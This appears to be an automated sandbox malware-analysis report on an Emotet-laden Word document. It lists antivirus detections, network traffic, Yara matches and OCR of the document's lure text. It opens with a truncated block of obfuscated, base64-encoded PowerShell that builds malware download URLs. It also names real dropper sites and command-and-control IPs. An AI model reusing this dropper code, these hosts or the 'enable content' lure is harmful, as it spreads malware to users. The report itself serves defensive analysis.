ASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJ

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://3musketeersent.net/wp-includes/TUgD/Avira URL Cloud: Label: malware
                      Source: http://dashudance.com/thinkphp/dgs7Jm9/Avira URL Cloud: Label: malware
                      Source: http://shannared.com/content/lhALeS/Avira URL Cloud: Label: malware
                      Source: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/Avira URL Cloud: Label: malware
                      Source: http://leopardcranes.com/zynq-linux-yaayf/w/Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: http://3musketeersent.net/wp-includes/TUgD/Virustotal: Detection: 8%Perma Link
                      Source: https://skilmu.com/wp-admin/hQVlB8b/Virustotal: Detection: 10%Perma Link
                      Source: http://jeevanlic.com/wp-content/r8M/Virustotal: Detection: 14%Perma Link
                      Source: http://dashudance.com/thinkphp/dgs7Jm9/Virustotal: Detection: 14%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\Kaktksw\An6othh\N49I.dllReversingLabs: Detection: 54%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: ARCH_25_012021.docVirustotal: Detection: 16%Perma Link
                      Source: ARCH_25_012021.docReversingLabs: Detection: 26%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\Kaktksw\An6othh\N49I.dllJoe Sandbox ML: detected
                      Source: 12.2.rundll32.exe.240000.0.unpackAvira: Label: TR/ATRAPS.Gen
                      Source: 8.2.rundll32.exe.740000.1.unpackAvira: Label: TR/ATRAPS.Gen
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028CC2A CryptDecodeObjectEx,

                      Compliance:

                      barindex
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2090288416.0000000002930000.00000002.00000001.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: global trafficDNS query: name: shannared.com
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.169.223.13:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.169.223.13:80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.22:49166 -> 84.232.229.24:80
                      Source: TrafficSnort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.22:49167 -> 51.255.203.164:8080
                      Source: TrafficSnort IDS: 2404328 ET CNC Feodo Tracker Reported CnC Server TCP group 15 192.168.2.22:49169 -> 217.160.169.110:8080
                      Source: TrafficSnort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49171 -> 185.183.16.47:80
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmpString found in memory: http://shannared.com/content/lhALeS/!http://jeevanlic.com/wp-content/r8M/!http://dashudance.com/thinkphp/dgs7Jm9/!http://leopardcranes.com/zynq-linux-yaayf/w/!http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/!http://3musketeersent.net/wp-includes/TUgD/!https://skilmu.com/wp-admin/hQVlB8b/
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 51.255.203.164:8080
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 217.160.169.110:8080
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Tue, 26 Jan 2021 23:10:16 GMTContent-Disposition: attachment; filename="O9TGnKaUCw.dll"Content-Transfer-Encoding: binarySet-Cookie: 6010a158c3613=1611702616; expires=Tue, 26-Jan-2021 23:11:16 GMT; Max-Age=60; path=/Last-Modified: Tue, 26 Jan 2021 23:10:16 GMTX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Type: application/octet-streamX-Cacheable: YES:ForcedContent-Length: 631808Accept-Ranges: bytesDate: Tue, 26 Jan 2021 23:10:16 GMTAge: 0Vary: User-AgentX-Cache: uncachedX-Cache-Hit: MISSX-Backend: all_requestsData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 30 06 00 00 70 03 00 00 00 00 00 bc 3e 06 00 00 10 00 00 00 40 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 ec 22 00 00 00 10 07 00 00 c6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 d4 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 e8 2e 06 00 00 10 00 00 00 30 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 cc 14 00 00 00 40 06 00 00 16 00 00 00 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 d1 0c 00 00 00 60 06 00 00 00 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 22 00 00 00 70 06 00 00 24 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d4 6e 00 00 00 a0 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*
                      Source: global trafficHTTP traffic detected: GET /content/lhALeS/ HTTP/1.1Host: shannared.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 84.232.229.24 84.232.229.24
                      Source: Joe Sandbox ViewIP Address: 192.169.223.13 192.169.223.13
                      Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewASN Name: RCS-RDS73-75DrStaicoviciRO RCS-RDS73-75DrStaicoviciRO
                      Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.183.16.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.183.16.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.183.16.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.183.16.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.183.16.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.183.16.47
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5248432-B174-499E-B3BD-E7523F18DF93}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /content/lhALeS/ HTTP/1.1Host: shannared.comConnection: Keep-Alive
                      Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknownDNS traffic detected: queries for: shannared.com
                      Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmpString found in binary or memory: http://3musketeersent.net/wp-includes/TUgD/
                      Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmpString found in binary or memory: http://dashudance.com/thinkphp/dgs7Jm9/
                      Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmpString found in binary or memory: http://jeevanlic.com/wp-content/r8M/
                      Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmpString found in binary or memory: http://leopardcranes.com/zynq-linux-yaayf/w/
                      Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmpString found in binary or memory: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/
                      Source: powershell.exe, 00000005.00000002.2089932064.0000000002360000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2096763886.0000000002910000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2095818604.0000000003CE6000.00000004.00000001.sdmpString found in binary or memory: http://shannared.com
                      Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmpString found in binary or memory: http://shannared.com/content/lhALeS/
                      Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2089932064.0000000002360000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2096763886.0000000002910000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmpString found in binary or memory: https://skilmu.com/wp-admin/hQVlB8b/

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0000000F.00000002.2108207451.0000000000170000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2102924374.0000000000660000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2102828167.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2094445834.0000000000710000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2095209420.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2097508616.0000000000300000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2101092569.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2108344528.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2338438182.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2102745390.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2100869950.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2107877116.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2099763419.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2094474454.0000000000740000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2098058880.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2101004097.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2098090844.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2108318970.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2338458694.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2095115818.0000000000180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2095854537.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2107894176.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2099872528.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2098968815.0000000000140000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2092243778.0000000000340000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.660000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.410000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.340000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.3e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.740000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.3e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.660000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.3e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.3e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.410000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.410000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.740000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.5a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.410000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , word
                      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
                      Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , words: 8,758 , C i N@m 13
                      Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT buttons to preview this document. a
                      Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT buttons to preview this
                      Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT buttons to preview this document. a
